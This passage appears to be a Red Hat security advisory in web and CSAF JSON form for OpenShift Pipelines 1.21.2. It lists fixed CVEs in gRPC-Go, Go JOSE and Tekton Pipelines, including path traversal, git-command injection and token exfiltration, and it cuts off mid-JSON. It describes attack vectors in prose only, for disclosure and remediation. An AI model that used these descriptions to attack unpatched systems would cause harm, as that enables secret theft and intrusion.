"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/tektoncd/pipeline: Tekton Pipelines: Arbitrary code execution and secret exfiltration via malicious git commands"
}
]
}
RHSA-2026:24484
Vulnerability from csaf_redhat - Published: 2026-06-08 13:25 - Updated: 2026-06-09 12:00Summary
Red Hat Security Advisory: Red Hat OpenShift Pipelines Release 1.21.2
Severity
Important
Notes
Topic: The 1.21.2 GA release of Red Hat OpenShift Pipelines Operator..
For more details see [product documentation](https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines).
Details: The 1.21.2 release of Red Hat OpenShift Pipelines Operator.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.
9.1 (Critical)
Affected products
Fixed
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in Tekton Pipelines, specifically in the Tekton Pipelines git resolver. A tenant with permissions to create ResolutionRequests can exploit a path traversal vulnerability via the `pathInRepo` parameter. This allows the tenant to read arbitrary files from the resolver pod's filesystem, leading to information disclosure, including sensitive ServiceAccount tokens. The contents of these files are returned in a base64-encoded format.
9.6 (Critical)
Affected products
Fixed
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in Go JOSE, a library for handling JSON Web Encryption (JWE) objects. A remote attacker could exploit this vulnerability by providing a specially crafted JWE object. When decrypting such an object, if a key wrapping algorithm is specified but the encrypted key field is empty, the application can crash. This leads to a denial of service (DoS), making the affected service unavailable to legitimate users.
7.5 (High)
Affected products
Fixed
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in Tekton Pipelines. A tenant with permissions to create TaskRun or PipelineRun resources can exploit this vulnerability. By omitting the Git API token parameter and pointing the serverURL to an attacker-controlled endpoint, the system-configured Git API token (such as a GitHub Personal Access Token or GitLab token) can be sent to the attacker. This information disclosure allows for the exfiltration of sensitive API tokens.
7.7 (High)
Affected products
Fixed
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Moderate
A flaw was found in Tekton Pipelines, a system for declaring continuous integration/continuous delivery (CI/CD) pipelines. An authenticated user, able to submit `ResolutionRequest` objects, can exploit a vulnerability by injecting malicious commands into the git resolver's revision parameter. This allows for the execution of unauthorized programs on the resolver pod. Successful exploitation can lead to the exfiltration of all cluster-wide secrets, resulting in significant information disclosure.
8.5 (High)
Affected products
Fixed
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
References
45 references
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The 1.21.2 GA release of Red Hat OpenShift Pipelines Operator..\nFor more details see [product documentation](https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines).",
"title": "Topic"
},
{
"category": "general",
"text": "The 1.21.2 release of Red Hat OpenShift Pipelines Operator.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:24484",
"url": "https://access.redhat.com/errata/RHSA-2026:24484"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33186",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33211",
"url": "https://access.redhat.com/security/cve/CVE-2026-33211"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-34986",
"url": "https://access.redhat.com/security/cve/CVE-2026-34986"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40161",
"url": "https://access.redhat.com/security/cve/CVE-2026-40161"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40938",
"url": "https://access.redhat.com/security/cve/CVE-2026-40938"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_24484.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Pipelines Release 1.21.2",
"tracking": {
"current_release_date": "2026-06-09T12:00:35+00:00",
"generator": {
"date": "2026-06-09T12:00:35+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.2"
}
},
"id": "RHSA-2026:24484",
"initial_release_date": "2026-06-08T13:25:01+00:00",
"revision_history": [
{
"date": "2026-06-08T13:25:01+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-08T13:25:18+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-09T12:00:35+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Pipelines 1.21.1",
"product": {
"name": "Red Hat OpenShift Pipelines 1.21.1",
"product_id": "Red Hat OpenShift Pipelines 1.21.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_pipelines:1.21::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Pipelines"
},
{
"branches": [
{
"category": "product_version",
"name": "serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"product": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"product_id": "serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"product_identification_helper": {
"purl": "pkg:generic/serve-tkn-cli-1-21-serve-tkn-cli@1.21.1?filename=tkn-linux-amd64.tar.gz\u0026checksum=sha256:1d83c432b0e6c0822ab587bab9c328f0d51953171cce2ba397de02d21034bfc3\u0026download_url=https://developers.redhat.com/products"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"product": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"product_id": "serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"product_identification_helper": {
"purl": "pkg:generic/serve-tkn-cli-1-21-serve-tkn-cli@1.21.1?filename=tkn-linux-arm64.tar.gz\u0026checksum=sha256:2dbb63184ee7948c98658ae99f675f41ac976a2efc1396be16e36b9fec177186\u0026download_url=https://developers.redhat.com/products"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"product": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"product_id": "serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"product_identification_helper": {
"purl": "pkg:generic/serve-tkn-cli-1-21-serve-tkn-cli@1.21.1?filename=tkn-linux-ppc64le.tar.gz\u0026checksum=sha256:50e064755c3104b35b5883655dee2bb2cd352dad6e7685c391f81c6017613211\u0026download_url=https://developers.redhat.com/products"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "serve-tkn-cli-1-21-serve-tkn-cli@s390x",
"product": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@s390x",
"product_id": "serve-tkn-cli-1-21-serve-tkn-cli@s390x",
"product_identification_helper": {
"purl": "pkg:generic/serve-tkn-cli-1-21-serve-tkn-cli@1.21.1?filename=tkn-linux-s390x.tar.gz\u0026checksum=sha256:e2510c70aceb3ee68d3b7086f01fd9270973d41720c77ce9f53d9a9dd40ee675\u0026download_url=https://developers.redhat.com/products"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"product": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"product_id": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"product_identification_helper": {
"purl": "pkg:generic/serve-tkn-cli-1-21-serve-tkn-cli@1.21.1?filename=tkn-macos-amd64.tar.gz\u0026checksum=sha256:268eba587e7c566344e539f1731840a02b9ed0ff4cb351dd65e0c246041254d4\u0026download_url=https://developers.redhat.com/products"
}
}
}
],
"category": "architecture",
"name": "amd64_darwin"
},
{
"branches": [
{
"category": "product_version",
"name": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"product": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"product_id": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"product_identification_helper": {
"purl": "pkg:generic/serve-tkn-cli-1-21-serve-tkn-cli@1.21.1?filename=tkn-macos-arm64.tar.gz\u0026checksum=sha256:31b832afad8633c63b531c64c4d349c5f776d1a43f0b52095271ee967c1b346a\u0026download_url=https://developers.redhat.com/products"
}
}
}
],
"category": "architecture",
"name": "arm64_darwin"
},
{
"branches": [
{
"category": "product_version",
"name": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"product": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"product_id": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"product_identification_helper": {
"purl": "pkg:generic/serve-tkn-cli-1-21-serve-tkn-cli@1.21.1?filename=tkn-windows-amd64.zip\u0026checksum=sha256:25fbcc9e8235dcdadc64865c8d8dd630260c28bb7c81a827dd7288353db735d4\u0026download_url=https://developers.redhat.com/products"
}
}
}
],
"category": "architecture",
"name": "amd64_windows"
},
{
"branches": [
{
"category": "product_version",
"name": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"product": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"product_id": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"product_identification_helper": {
"purl": "pkg:generic/serve-tkn-cli-1-21-serve-tkn-cli@1.21.1?filename=tkn-windows-arm64.zip\u0026checksum=sha256:afcb8312ad7934d31bac0977e67c805d723cbd528d2dc07db5c5cb1a2a36b9a0\u0026download_url=https://developers.redhat.com/products"
}
}
}
],
"category": "architecture",
"name": "arm64_windows"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@amd64 as a component of Red Hat OpenShift Pipelines 1.21.1",
"product_id": "Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64"
},
"product_reference": "serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.21.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin as a component of Red Hat OpenShift Pipelines 1.21.1",
"product_id": "Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin"
},
"product_reference": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.21.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows as a component of Red Hat OpenShift Pipelines 1.21.1",
"product_id": "Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows"
},
"product_reference": "serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.21.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@arm64 as a component of Red Hat OpenShift Pipelines 1.21.1",
"product_id": "Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64"
},
"product_reference": "serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.21.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin as a component of Red Hat OpenShift Pipelines 1.21.1",
"product_id": "Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin"
},
"product_reference": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.21.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows as a component of Red Hat OpenShift Pipelines 1.21.1",
"product_id": "Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows"
},
"product_reference": "serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.21.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@ppc64le as a component of Red Hat OpenShift Pipelines 1.21.1",
"product_id": "Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le"
},
"product_reference": "serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.21.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "serve-tkn-cli-1-21-serve-tkn-cli@s390x as a component of Red Hat OpenShift Pipelines 1.21.1",
"product_id": "Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
},
"product_reference": "serve-tkn-cli-1-21-serve-tkn-cli@s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.21.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-33186",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-03-20T23:02:27.802640+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449833"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "RHBZ#2449833",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449833"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33186",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3",
"url": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3"
}
],
"release_date": "2026-03-20T22:23:32.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-08T13:25:01+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24484"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
